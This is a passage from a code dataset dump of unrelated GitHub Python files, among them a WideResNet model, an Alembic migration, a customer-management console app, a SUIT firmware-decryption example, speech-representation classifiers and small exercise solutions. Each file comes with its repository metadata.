and in_planes or out_planes determines the first argument\n #i == 0 and stride or 1 determines the third argument\n layers.append(block(i == 0 and in_planes or out_planes, out_planes,\n i == 0 and stride or 1, drop_rate, activate_before_residual))\n return nn.Sequential(*layers)\n # finally the input x passes through the stacked BasicBlocks to produce the output\n def forward(self, x):\n return self.layer(x)\n\n# The final WideResNet model.\n# A WideResNet consists of several NetworkBlocks plus pooling, relu and other modules;\n# a NetworkBlock consists of several BasicBlocks.\nclass WideResNet(nn.Module):\n def __init__(self, num_classes, depth=28, widen_factor=2, drop_rate=0.0):\n super(WideResNet, self).__init__()\n # the output width grows from stage to stage\n channels = [16, 16*widen_factor, 32*widen_factor, 64*widen_factor]\n assert((depth - 4) % 6 == 0)\n n = (depth - 4) / 6 # how many BasicBlocks are stacked in each NetworkBlock\n # pass the class itself; arguments are supplied to it later\n block = BasicBlock\n # 1st conv before any network block\n # input has 3 channels, output has 16\n self.conv1 = nn.Conv2d(3, channels[0], kernel_size=3, stride=1,\n padding=1, bias=False)\n # 1st block\n self.block1 = NetworkBlock(\n n, channels[0], channels[1], block, 1, drop_rate, activate_before_residual=True)\n # 2nd block\n self.block2 = NetworkBlock(\n n, channels[1], channels[2], block, 2, drop_rate)\n # 3rd block\n self.block3 = NetworkBlock(\n n, channels[2], channels[3], block, 2, drop_rate)\n # global average pooling and classifier\n self.bn1 = nn.BatchNorm2d(channels[3], momentum=0.001)\n self.relu = nn.LeakyReLU(negative_slope=0.1, inplace=True)\n self.fc = nn.Linear(channels[3], num_classes)\n # the final feature dimension is channels[3]\n self.channels = channels[3]\n # initialize the model parameters\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight,\n mode='fan_out',\n nonlinearity='leaky_relu')\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1.0)\n nn.init.constant_(m.bias, 0.0)\n elif isinstance(m, nn.Linear):\n nn.init.xavier_normal_(m.weight)\n nn.init.constant_(m.bias, 0.0)\n\n def forward(self, x):\n out = self.conv1(x)#channels[0]\n out = self.block1(out)#channels[1]\n out = self.block2(out)#channels[2]\n out = self.block3(out)#channels[3]\n out = self.relu(self.bn1(out))\n out = F.adaptive_avg_pool2d(out, 1)\n # flatten the final features: whatever the channel count, they become one dimension\n out = out.view(-1, self.channels)\n # Map the flattened features to the number of classes so classification is possible,\n # i.e. from a 3D feature tensor down to num_classes dimensions.\n return self.fc(out)\n\n\ndef build_wideresnet(depth, widen_factor, dropout, num_classes):\n logger.info(f\"Model: WideResNet {depth}x{widen_factor}\")\n return WideResNet(depth=depth,\n widen_factor=widen_factor,\n drop_rate=dropout,\n num_classes=num_classes)\n","repo_name":"zzziCode/fixmatch-pytorch","sub_path":"models/wideresnet.py","file_name":"wideresnet.py","file_ext":"py","file_size_in_byte":7766,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"14544655826","text":"# A\ndef reorderDigits(list, direction):\n x = []\n for i in list:\n if direction == \"asc\":\n x.append(int(\"\".join(sorted(str(i)))))\n elif direction == \"desc\":\n x.append(int(\"\".join(sorted(str(i), reverse=True))))\n print(x)\n\nreorderDigits([515, 341, 98, 44, 211], \"asc\")\nreorderDigits([515, 341, 98, 44, 211], \"desc\")\nreorderDigits([63251, 78221], \"asc\")\nreorderDigits([63251, 78221], \"desc\")\nreorderDigits([1, 2, 3, 4], \"asc\")\nreorderDigits([1, 2, 3, 4], \"desc\")\n\n\n# B\ndef canPartition(list):\n for i in range(0, len(list)):\n x = list.pop(i)\n y = 1\n for j in list:\n y *= j\n list.insert(i, x) # restore the element before testing so the input list is never left mutated\n if x == y:\n print(\"true\")\n break\n else:\n 
print(\"false\")\n\ncanPartition([2,8,4,1])\ncanPartition([-1,-10,1,-2,20])\ncanPartition([-1,-20,5,-1,-2,2])\n\n\n\n\n\n\n\n","repo_name":"Jkim2308/WeeklyCodingChallenge","sub_path":"Week2/Week2.py","file_name":"Week2.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8504128933","text":"#!/usr/bin/python env python3\r\n\r\nimport numpy as np\r\nimport fplib \r\n\r\ndef readvasp(vp):\r\n buff = []\r\n with open(vp) as f:\r\n for line in f:\r\n buff.append(line.split())\r\n\r\n lat = np.array(buff[2:5], float)\r\n try:\r\n typt = np.array(buff[5], int)\r\n except:\r\n del(buff[5])\r\n typt = np.array(buff[5], int)\r\n nat = sum(typt)\r\n pos = np.array(buff[7:7 + nat], float)\r\n types = []\r\n for i in range(len(typt)):\r\n types += [i+1]*typt[i]\r\n types = np.array(types, int)\r\n rxyz = np.dot(pos, lat)\r\n return lat, rxyz, types\r\n\r\ndef test():\r\n znucl = [14, 8]\r\n lat1, rxyz1, types1 = readvasp('struct1.vasp')\r\n lat2, rxyz2, types2 = readvasp('struct2.vasp')\r\n\r\n cell1 = (lat1, rxyz1, types1, znucl)\r\n cell2 = (lat2, rxyz2, types2, znucl)\r\n fp1 = fplib.get_lfp(cell1, cutoff=6, log=True)\r\n fp2 = fplib.get_lfp(cell2, cutoff=6, log=True)\r\n\r\n dist = fplib.get_fp_dist(fp1, fp2, types1)\r\n\r\n print ('fingerprint distance between struct1 and struct2: ', dist)\r\n\r\nif __name__ == \"__main__\":\r\n test()\r\n","repo_name":"zhuligs/fplib","sub_path":"examples/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"8302865898","text":"\"\"\"Initial migration\n\nRevision ID: 78c2284225d0\nRevises: \nCreate Date: 2021-09-14 20:33:51.472108\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '78c2284225d0'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('champions',\n sa.Column('id', sa.Integer(), autoincrement=False, nullable=False),\n sa.Column('name', sa.String(), nullable=False),\n sa.Column('icon_url', sa.String(), nullable=True),\n sa.PrimaryKeyConstraint('id', name=op.f('pk_champions'))\n )\n with op.batch_alter_table('champions', schema=None) as batch_op:\n batch_op.create_index(batch_op.f('ix_champions_id'), ['id'], unique=False)\n\n op.create_table('skins',\n sa.Column('id', sa.Integer(), autoincrement=False, nullable=False),\n sa.Column('name', sa.String(), nullable=False),\n sa.Column('trimmed_image_url', sa.String(), nullable=True),\n sa.Column('full_image_url', sa.String(), nullable=True),\n sa.Column('champion_id', sa.Integer(), nullable=False),\n sa.Column('description', sa.String(), nullable=True),\n sa.Column('price', sa.Integer(), nullable=True),\n sa.Column('sale_price', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['champion_id'], ['champions.id'], name=op.f('fk_skins_champion_id_champions')),\n sa.PrimaryKeyConstraint('id', name=op.f('pk_skins'))\n )\n with op.batch_alter_table('skins', schema=None) as batch_op:\n batch_op.create_index(batch_op.f('ix_skins_id'), ['id'], unique=False)\n\n op.create_table('price_history',\n sa.Column('skin_id', sa.Integer(), nullable=False),\n sa.Column('date', sa.Date(), nullable=False),\n sa.Column('price', sa.Integer(), nullable=True),\n sa.Column('sale_price', sa.Integer(), nullable=True),\n sa.Column('is_available', sa.Boolean(), server_default='false', nullable=False),\n sa.Column('is_on_sale', sa.Boolean(), server_default='false', nullable=False),\n sa.ForeignKeyConstraint(['skin_id'], ['skins.id'], name=op.f('fk_price_history_skin_id_skins')),\n sa.PrimaryKeyConstraint('skin_id', 'date', name=op.f('pk_price_history'))\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n    op.drop_table('price_history')\n    with op.batch_alter_table('skins', schema=None) as batch_op:\n        batch_op.drop_index(batch_op.f('ix_skins_id'))\n\n    op.drop_table('skins')\n    with op.batch_alter_table('champions', schema=None) as batch_op:\n        batch_op.drop_index(batch_op.f('ix_champions_id'))\n\n    op.drop_table('champions')\n    # ### end Alembic commands ###\n","repo_name":"Remian103/lolskin-price-tracker","sub_path":"backend/alembic/versions/78c2284225d0_initial_migration.py","file_name":"78c2284225d0_initial_migration.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"43821416165","text":"namelist=[]\nagelist=[]\nidlist=[]\nmoblist=[]\nindex=0\nwhile(1):\n    try:\n        print(\"Welcome to the Customer Management System\")\n        print(\"Please select your choice from given below : \")\n        print(\"1.Add Customer\",\"2.Update Customer\",\"3.Remove Customer\",\"4.Search Customer\",\"5.Display All\",\"6.Exit\",sep=\"\\n\")\n        x=int(input(\"Please Enter your Choice here : \"))\n        # ----------------------------(Add Customer)-----------------------------------------------------------------------\n        if(x==1):\n            index+=1\n            print(\"Enter the Details of the Customer\")\n            a=input(\"Enter the Name of the Customer : \")\n            namelist.append(a)\n            while(1):\n                b=input(\"Enter the Age of the Customer : \")\n                if(b.isnumeric()):\n                    agelist.append(b)\n                    break\n                else:\n                    print(\"Please Enter Age only in Numeric Form\")\n            while(1):\n                c=input(\"Please Enter your 10 Digit Mobile Number : \")\n                if(c.isnumeric()):\n                    moblist.append(c)\n                    break\n                else:\n                    print(\"Please enter a valid mobile number\")\n            idlist.append(index)\n            print(namelist,agelist,idlist,moblist,sep='\\n')\n        # ----------------------(update Customer)------------------------------------------------------------------------------\n        elif(x==2):\n            while(1):\n                id=input(\"Enter Customer ID :\")\n                if(id.isnumeric()):\n                    id=int(id)\n                    pos=idlist.index(id)\n                    namelist.pop(pos)\n                    agelist.pop(pos)\n                    moblist.pop(pos)\n                    a = input(\"Enter the Name : \")\n                    namelist.insert(pos,a)\n                    while(1):\n                        b = input(\"Enter the Age of Customer\")\n                        if(b.isnumeric()):\n                            b=int(b)\n                            agelist.insert(pos,b)\n                            break\n                        else:\n                            print(\"Please enter valid age\")\n                    while(1):\n                        c = input(\"Enter Mobile Number : \")\n                        if(c.isnumeric()):\n                            moblist.insert(pos,c)\n                            break\n                        else:\n                            print(\"Please enter valid mobile number\")\n                    break\n        # ---------------------------------------------------------------------------------------------------------------------\n        # -------------------------------------(Remove Customer)---------------------------------------------------------------\n        elif(x==3):\n            while (1):\n                id = input(\"Enter Customer ID :\")\n                if (id.isnumeric()):\n                    id = int(id)\n                    pos=idlist.index(id)\n                    namelist.pop(pos)\n                    agelist.pop(pos)\n                    moblist.pop(pos)\n                    idlist.pop(pos)\n                    print(\"Customer Removed Successfully\")\n                    break\n                else:\n                    print(\"Please Enter Valid Customer ID\")\n        # ---------------------------------------------------------------------------------------------------------------------\n        # -----------------------------------(Search Customer)-----------------------------------------------------------------\n        elif (x==4):\n            while (1):\n                id = input(\"Enter Customer ID :\")\n                if (id.isnumeric()):\n                    id=int(id)\n                    pos=idlist.index(id)\n                    name=namelist[pos]\n                    age=agelist[pos]\n                    mob=moblist[pos]\n                    print(\"Name :\",name,\"Age : \",age,\"Mobile No. 
: \",mob,sep=\"\\n\")\n break\n else:\n print(\"The Please enter a valid ID\")\n # ---------------------------------------------------------------------------------------------------------------------\n # -----------------------------(Display All)---------------------------------------------------------------------------\n elif(x==5):\n for i in range(len(idlist)):\n print(\"Cus. Name :\",namelist[i],\"Cus. Age :\",agelist(i),\"Cus. ID :\",idlist(i),\"Cus. Mobile :\",moblist(i))\n elif(x==6):\n print(\"Thankyou\")\n except Exception as e:\n print(\"Error\",e)\n# ---------------------------------------------------------------------------------------------------------------------","repo_name":"hapmishra/Customer-Management-System","sub_path":"Basic_code_consolbased.py","file_name":"Basic_code_consolbased.py","file_ext":"py","file_size_in_byte":4643,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"28447143412","text":"import os\nimport uvicore\nfrom uvicore import log\nfrom uvicore.support import str\nfrom uvicore.console import command, argument\nfrom uvicore.support.dumper import dump, dd\nfrom uvicore.support.schematic import Schematic\n\n\n@command()\n@argument('name')\nasync def command(name: str):\n \"\"\"\n \\b\n Generate a new CLI command schematic...\n \\b\n USAGE:\n Commands should be lower_underscore and SINGULAR (plural is OK)\n Remember to manually add the command to your service provider!\n \\b\n ./uvicore gen command welcome\n ./uvicore gen command process\n ./uvicore gen command scan_files\n \"\"\"\n\n stub = os.path.dirname(__file__) + '/stubs/command.py'\n dest = uvicore.config('app.paths.commands') + '/' + name + '.py'\n\n Schematic(\n type='command',\n stub=stub,\n dest=dest,\n replace = [\n ('xx_name', name)\n ]\n ).generate()\n\n # Get running package\n package = uvicore.app.package(main=True)\n\n log.nl()\n log.header('Add this to your Service Provider boot() or define_commands self.commands()')\n print(\"'{}': '{}.commands.{}.cli',\".format(str.kebab(name), package.name, name))\n\n log.nl()\n log.notice('IF you do NOT have a self.commands() already in your Service Provider, add this')\n print(\"\"\"self.commands(\n group='{}',\n help='{} Commands',\n commands={{\n '{}': '{}.commands.{}.cli',\n }}\n)\"\"\".format(\n package.short_name,\n str.studly(package.short_name),\n str.kebab(name),\n package.name,\n name,\n ))\n","repo_name":"uvicore/framework","sub_path":"uvicore/console/commands/generators.py","file_name":"generators.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"31"} +{"seq_id":"1457200485","text":"#!/usr/bin/env python3\n\nimport base64\nfrom cbor2 import dumps\nfrom cwt import COSE, COSEKey\n\n# See Section 6.1.4 Example (AES-KW)\n# https://datatracker.ietf.org/doc/html/draft-ietf-suit-firmware-encryption#name-example\nprint(\"Example 1: AES-KW\")\nsecret_key_jwk = {\n \"kty\": \"Symmetric\",\n \"k\": \"61\" * 16, # 0x61 = 'a'\n \"alg\": \"A128KW\",\n \"kid\": \"kid-1\",\n}\nprint(f\"Secret COSE_Key: {secret_key_jwk}\")\nfor key in [\"k\"]:\n secret_key_jwk[key] = base64.b64encode(bytes.fromhex(secret_key_jwk[key])).decode()\nwith open(\"./encrypted-payload-aes-kw-aes-gcm.hex\", \"r\") as f:\n encrypted_payload_hex = ''.join(f.read().splitlines())\nprint(f\"Encrypted Payload: {encrypted_payload_hex}\")\nwith open(\"./suit-encryption-info-aes-kw-aes-gcm.hex\", \"r\") as f:\n suit_encryption_info_hex = 
''.join(f.read().splitlines())\nprint(f\"SUIT_Encryption_Info: {suit_encryption_info_hex}\")\n\n# Decrypt the Encrypted Payload using SUIT_Encryption_Info\n# NOTE: python-cwt does not support detached content feature used in SUIT Encrypted Payloads\n#       With this feature, the payload is encoded with `null` (0xF6 in hex)\n#       and can be replaced with bstr wrapped encrypted_payload.\n\n# 1. Generate bstr wrapped encrypted_payload in hex\nencrypted_payload_bytes = bytes.fromhex(encrypted_payload_hex)\nencrypted_payload_bstr_hex = dumps(encrypted_payload_bytes).hex()\n\n# 2. Replace `null` (0xF6 in hex) by bstr wrapped encrypted_payload\n# NOTE: Skip 13 bytes (26 characters) of protected and unprotected headers\nindex = suit_encryption_info_hex.find(\"F6\", 26)\nassert index >= 0\ncose_encrypt_hex = suit_encryption_info_hex[0:index] + encrypted_payload_bstr_hex + suit_encryption_info_hex[index + 2:]\n\nprint(f\"\\nConcatenated COSE_Encrypt (non detached content): {cose_encrypt_hex}\")\ncose_encrypt_bytes = bytes.fromhex(cose_encrypt_hex)\n\nsecret_key = COSEKey.from_jwk(secret_key_jwk)\n\nctx = COSE.new()\nresult = ctx.decode(cose_encrypt_bytes, keys=[secret_key])\nprint(f\"\\nDecrypted Payload: {result}\")\nassert result == b'This is a real firmware image.'\nprint(\"Successfully decrypted\")\n","repo_name":"suit-wg/suit-firmware-encryption","sub_path":"examples/validate_aeskw_suit_encryption_info.py","file_name":"validate_aeskw_suit_encryption_info.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"42673743812","text":"#!/usr/bin/env checkio --domain=py run triangle-angles\n\n# You are given the lengths for each side on a triangle. You need to find all three angles for this triangle. If the given side lengths cannot form a triangle (or form a degenerated triangle), then you must return all angles as 0 (zero). The angles should be represented as a list of integers in ascending order. Each angle is measured in degrees and rounded to the nearest integer number (Standard mathematical rounding).\n# \n# \n# \n# Input: The lengths of the sides of a triangle as integers.\n# \n# Output: Angles of a triangle in degrees as sorted list of integers.\n# \n# Precondition:\n# 0 < a,b,c ≤ 1000\n# \n# \n# END_DESC\n\nfrom typing import List\nimport math\n\n\ndef checkio(a: int, b: int, c: int) -> List[int]:\n\n    if (a+b <= c) or (b+c <= a) or (c+a <= b):\n        return [0, 0, 0]\n\n    angle_a = math.acos((b**2+c**2-a**2)/(2*b*c)) / math.pi * 180\n    angle_b = math.acos((a**2+c**2-b**2)/(2*a*c)) / math.pi * 180\n    angle_c = math.acos((a**2+b**2-c**2)/(2*a*b)) / math.pi * 180\n    # print('a: {}, b: {}, c: {}'.format(angle_a, angle_b, angle_c))\n    li = [angle_a, angle_b, angle_c]\n    ans_int = [int(round(x)) for x in li]\n    ans = sorted(ans_int)\n\n    # print(ans)\n    return ans\n\n\nif __name__ == '__main__':\n\n    # These \"asserts\" using only for self-checking and not necessary for auto-testing\n    print(\"Example:\")\n    print(checkio(4, 4, 4))\n    # print(checkio(3, 4, 5))\n    # print(checkio(2, 2, 5))\n\n    assert checkio(4, 4, 4) == [60, 60, 60], \"All sides are equal\"\n    assert checkio(3, 4, 5) == [37, 53, 90], \"Egyptian triangle\"\n    assert checkio(2, 2, 5) == [0, 0, 0], \"It's can not be a triangle\"\n    print(\"Coding complete? 
Click 'Check' to earn cool rewards!\")","repo_name":"todatech/checkio","sub_path":"py_checkio_solutions/Blizzard/triangle_angles.py","file_name":"triangle_angles.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36861683992","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom tensorflow.core.protobuf import config_pb2\nfrom tensorflow.python import pywrap_tensorflow\nfrom tensorflow.python.framework import constant_op\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.ops import variables\nfrom tensorflow.python.platform import test\n\n\nclass StatSummarizerTest(test.TestCase):\n\n def testStatSummarizer(self):\n with ops.Graph().as_default() as graph:\n matrix1 = constant_op.constant([[3., 3.]], name=r\"m1\")\n matrix2 = constant_op.constant([[2.], [2.]], name=r\"m2\")\n product = math_ops.matmul(matrix1, matrix2, name=r\"product\")\n\n graph_def = graph.as_graph_def()\n ss = pywrap_tensorflow.NewStatSummarizer(graph_def.SerializeToString())\n\n with self.cached_session() as sess:\n sess.run(variables.global_variables_initializer())\n\n for _ in range(20):\n run_metadata = config_pb2.RunMetadata()\n run_options = config_pb2.RunOptions(\n trace_level=config_pb2.RunOptions.FULL_TRACE)\n sess.run(product, options=run_options, run_metadata=run_metadata)\n\n ss.ProcessStepStatsStr(run_metadata.step_stats.SerializeToString())\n\n output_string = ss.GetOutputString()\n\n print(output_string)\n\n # Test it recorded running the expected number of times.\n self.assertRegexpMatches(output_string, r\"count=20\")\n\n # Test that a header line got printed.\n self.assertRegexpMatches(output_string, r\"====== .* ======\")\n\n # Test that the nodes we added were analyzed.\n # The line for the op should contain both the op type (MatMul)\n # and the name of the node (product)\n self.assertRegexpMatches(output_string, r\"MatMul.*product\")\n self.assertRegexpMatches(output_string, r\"Const.*m1\")\n self.assertRegexpMatches(output_string, r\"Const.*m2\")\n\n # Test that a CDF summed to 100%\n self.assertRegexpMatches(output_string, r\"100\\.\")\n\n pywrap_tensorflow.DeleteStatSummarizer(ss)\n\n\nif __name__ == \"__main__\":\n test.main()\n","repo_name":"DeepRec-AI/DeepRec","sub_path":"tensorflow/contrib/stat_summarizer/python/stat_summarizer_test.py","file_name":"stat_summarizer_test.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":895,"dataset":"github-code","pt":"31"} +{"seq_id":"108668691","text":"import torch\nfrom torch import nn\nfrom torch.nn.utils.rnn import pack_padded_sequence\n\n\n#####################\n# LINEAR CLASSIFIER #\n#####################\nclass LinearClassifier(nn.Module):\n def __init__(self, input_dim, class_num, task, dconfig, sequencial=False):\n super(LinearClassifier, self).__init__()\n \n output_dim = class_num\n hidden_size = dconfig['hidden_size']\n drop = dconfig['drop']\n self.sequencial = sequencial\n self.select_hidden = dconfig['select_hidden']\n self.weight = nn.Parameter(torch.ones(12) / 12)\n\n if self.sequencial: \n self.rnn = nn.GRU(input_size=input_dim, hidden_size=hidden_size, num_layers=1, dropout=0.1,\n batch_first=True, bidirectional=False)\n self.dense1 = nn.Linear(hidden_size, hidden_size)\n else:\n self.dense1 = nn.Linear(input_dim, hidden_size)\n\n self.dense2 = 
nn.Linear(hidden_size, hidden_size)\n self.drop1 = nn.Dropout(p=drop)\n self.drop2 = nn.Dropout(p=drop)\n\n self.out = nn.Linear(hidden_size, output_dim)\n\n self.act_fn = torch.nn.functional.relu\n self.out_fn = nn.LogSoftmax(dim=-1)\n self.criterion = nn.CrossEntropyLoss(ignore_index=-100)\n\n\n def statistic(self, probabilities, labels, label_mask):\n assert(len(probabilities.shape) > 1)\n assert(probabilities.unbind(dim=-1)[0].shape == labels.shape)\n assert(labels.shape == label_mask.shape)\n\n valid_count = label_mask.sum()\n correct_count = ((probabilities.argmax(dim=-1) == labels).type(torch.cuda.LongTensor) * label_mask).sum()\n return correct_count, valid_count\n\n\n def forward(self, features, labels=None, label_mask=None):\n # features from mockingjay: (batch_size, layer, seq_len, feature)\n # features from baseline: (batch_size, seq_len, feature)\n # labels: (batch_size, seq_len), frame by frame classification\n batch_size = features.size(0)\n layer_num = features.size(1) if len(features.shape) == 4 else None\n seq_len = features.size(2) if len(features.shape) == 4 else features.size(1)\n feature_dim = features.size(3) if len(features.shape) == 4 else features.size(2)\n\n if len(features.shape) == 4:\n # compute mean on mockingjay representations if given features from mockingjay\n if self.select_hidden == 'last':\n features = features[:, -1, :, :]\n elif self.select_hidden == 'first':\n features = features[:, 0, :, :]\n elif self.select_hidden == 'average':\n features = features.mean(dim=1) # now simply average the representations over all layers, (batch_size, seq_len, feature)\n elif self.select_hidden == 'weighted_sum':\n features = features.transpose(0, 1).reshape(layer_num, -1)\n features = torch.matmul(self.weight[:layer_num], features).reshape(batch_size, seq_len, feature_dim)\n elif self.select_hidden == 'weighted_sum_norm':\n weights = nn.functional.softmax(self.weight[:layer_num], dim=-1)\n features = features.transpose(0, 1).reshape(layer_num, -1)\n features = torch.matmul(weights, features).reshape(batch_size, seq_len, feature_dim)\n else:\n raise NotImplementedError('Feature selection mode not supported!')\n\n # since the down-sampling (float length be truncated to int) and then up-sampling process\n # can cause a mismatch between the seq lenth of mockingjay representation and that of label\n # we truncate the final few timestamp of label to make two seq equal in length\n truncated_length = min(features.size(1), labels.size(-1))\n features = features[:, :truncated_length, :]\n labels = labels[:, :truncated_length]\n label_mask = label_mask[:, :truncated_length]\n \n if self.sequencial:\n features, h_n = self.rnn(features)\n\n hidden = self.dense1(features)\n hidden = self.drop1(hidden)\n hidden = self.act_fn(hidden)\n\n hidden = self.dense2(hidden)\n hidden = self.drop2(hidden)\n hidden = self.act_fn(hidden)\n\n logits = self.out(hidden)\n prob = self.out_fn(logits)\n \n if labels is not None:\n assert(label_mask is not None), 'When frame-wise labels are provided, validity of each timestamp should also be provided'\n labels_with_ignore_index = 100 * (label_mask - 1) + labels * label_mask\n\n # cause logits are in (batch, seq, class) and labels are in (batch, seq)\n # nn.CrossEntropyLoss expect to have (N, class) and (N,) as input\n # here we flatten logits and labels in order to apply nn.CrossEntropyLoss\n class_num = logits.size(-1)\n loss = self.criterion(logits.reshape(-1, class_num), labels_with_ignore_index.reshape(-1))\n \n # statistic for accuracy\n 
correct, valid = self.statistic(prob, labels, label_mask)\n\n return loss, prob.detach().cpu(), correct.detach().cpu(), valid.detach().cpu()\n\n return prob\n\n\nclass RnnClassifier(nn.Module):\n def __init__(self, input_dim, class_num, task, dconfig):\n # The class_num for regression mode should be 1\n\n super(RnnClassifier, self).__init__()\n self.config = dconfig\n self.weight = nn.Parameter(torch.ones(12) / 12)\n\n drop = self.config['drop']\n self.dropout = nn.Dropout(p=drop)\n\n linears = []\n last_dim = input_dim\n for linear_dim in self.config['pre_linear_dims']:\n linears.append(nn.Linear(last_dim, linear_dim))\n last_dim = linear_dim\n self.pre_linears = nn.ModuleList(linears)\n\n hidden_size = self.config['hidden_size']\n self.rnn = nn.GRU(input_size=last_dim, hidden_size=hidden_size, num_layers=1, dropout=drop,\n batch_first=True, bidirectional=False)\n\n linears = []\n last_dim = hidden_size\n for linear_dim in self.config['post_linear_dims']:\n linears.append(nn.Linear(last_dim, linear_dim))\n last_dim = linear_dim\n self.post_linears = nn.ModuleList(linears)\n\n self.act_fn = torch.nn.functional.relu\n self.out = nn.Linear(last_dim, class_num)\n \n mode = self.config['mode']\n if mode == 'classification':\n self.out_fn = nn.LogSoftmax(dim=-1)\n self.criterion = nn.CrossEntropyLoss(ignore_index=-100)\n elif mode == 'regression':\n self.criterion = nn.MSELoss()\n else:\n raise NotImplementedError('Only classification/regression modes are supported')\n\n\n def statistic(self, probabilities, labels):\n assert(len(probabilities.shape) > 1)\n assert(probabilities.unbind(dim=-1)[0].shape == labels.shape)\n\n valid_count = torch.LongTensor([len(labels)])\n correct_count = ((probabilities.argmax(dim=-1) == labels).type(torch.LongTensor)).sum()\n return correct_count, valid_count\n\n\n def forward(self, features, labels=None, valid_lengths=None):\n assert(valid_lengths is not None), 'Valid_lengths is required.'\n # features from mockingjay: (batch_size, layer, seq_len, feature)\n # features from baseline: (batch_size, seq_len, feature)\n # labels: (batch_size,), one utterance to one label\n # valid_lengths: (batch_size, )\n batch_size = features.size(0)\n layer_num = features.size(1) if len(features.shape) == 4 else None\n seq_len = features.size(2) if len(features.shape) == 4 else features.size(1)\n feature_dim = features.size(3) if len(features.shape) == 4 else features.size(2)\n\n select_hidden = self.config['select_hidden']\n if len(features.shape) == 4:\n # compute mean on mockingjay representations if given features from mockingjay\n if select_hidden == 'last':\n features = features[:, -1, :, :]\n elif select_hidden == 'first':\n features = features[:, 0, :, :]\n elif select_hidden == 'average':\n features = features.mean(dim=1) # now simply average the representations over all layers, (batch_size, seq_len, feature)\n elif select_hidden == 'weighted_sum':\n features = features.transpose(0, 1).reshape(layer_num, -1)\n features = torch.matmul(self.weight[:layer_num], features).reshape(batch_size, seq_len, feature_dim)\n elif select_hidden == 'weighted_sum_norm':\n weights = nn.functional.softmax(self.weight[:layer_num], dim=-1)\n features = features.transpose(0, 1).reshape(layer_num, -1)\n features = torch.matmul(weights, features).reshape(batch_size, seq_len, feature_dim)\n else:\n raise NotImplementedError('Feature selection mode not supported!')\n\n sample_rate = self.config['sample_rate']\n features = features[:, torch.arange(0, seq_len, sample_rate), :]\n valid_lengths /= 
sample_rate\n\n        for linear in self.pre_linears:\n            features = linear(features)\n            features = self.act_fn(features)\n            features = self.dropout(features)\n\n        packed = pack_padded_sequence(features, valid_lengths, batch_first=True, enforce_sorted=True)\n        _, h_n = self.rnn(packed)\n        hidden = h_n[-1, :, :]\n        # because h_n directly contains info for the final states\n        # it is easier to use h_n as the extracted embedding\n        \n        for linear in self.post_linears:\n            hidden = linear(hidden)\n            hidden = self.act_fn(hidden)\n            hidden = self.dropout(hidden)\n\n        logits = self.out(hidden)\n\n        mode = self.config['mode']\n        if mode == 'classification':\n            result = self.out_fn(logits)\n            # result: (batch_size, class_num)\n        elif mode == 'regression':\n            result = logits.reshape(-1)\n            # result: (batch_size, )\n        \n        if labels is not None:\n            loss = self.criterion(result, labels)\n\n            # statistic for accuracy\n            if mode == 'classification':\n                correct, valid = self.statistic(result, labels)\n            elif mode == 'regression':\n                # correct and valid have no meaning in regression mode\n                # they only exist so the outside wrapper can function correctly\n                correct, valid = torch.LongTensor([1]), torch.LongTensor([1])\n\n            return loss, result.detach().cpu(), correct, valid\n\n        return result\n\n\nclass example_classifier(nn.Module):\n    def __init__(self, input_dim, hidden_dim, class_num):\n        super(example_classifier, self).__init__()\n        self.rnn = nn.GRU(input_size=input_dim, hidden_size=hidden_dim, num_layers=1, dropout=0.3,\n                          batch_first=True, bidirectional=False)\n\n        self.out = nn.Linear(hidden_dim, class_num)\n        self.out_fn = nn.LogSoftmax(dim=-1)\n        self.criterion = nn.CrossEntropyLoss()\n\n    def forward(self, features, labels):\n        # features: (batch_size, seq_len, feature)\n        # labels: (batch_size,), one utterance to one label\n\n        _, h_n = self.rnn(features)\n        hidden = h_n[-1, :, :]\n        logits = self.out(hidden)\n        result = self.out_fn(logits)\n        loss = self.criterion(result, labels)\n\n        return loss\n\n","repo_name":"andi611/Mockingjay-Speech-Representation","sub_path":"downstream/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":11481,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"31"} +{"seq_id":"43581677987","text":"'''\r\nDavid Girard Sr Product Manager Trend Micro\r\nGet MITRE Evaluation #4 raw json results\r\nMarch 31st 2022\r\ntested with Python 3.9 but most 3.x should work\r\n'''\r\nimport requests # pip3 install requests\r\nimport json\r\nfrom openpyxl import Workbook # pip3 install openpyxl\r\nfrom openpyxl.styles import Font, Color\r\n\r\n\r\nbase_url = \"https://attackevals.mitre-engenuity.org/api/export/?participant=\"\r\nsuffix = \"&adversary=wizard-spider-sandworm\" #every json file on mitre-engenuity.org has this\r\nfilesuffix = '_wizard-spider-sandworm.json'\r\n\r\n#list of vendors in this year's eval\r\nvendors = 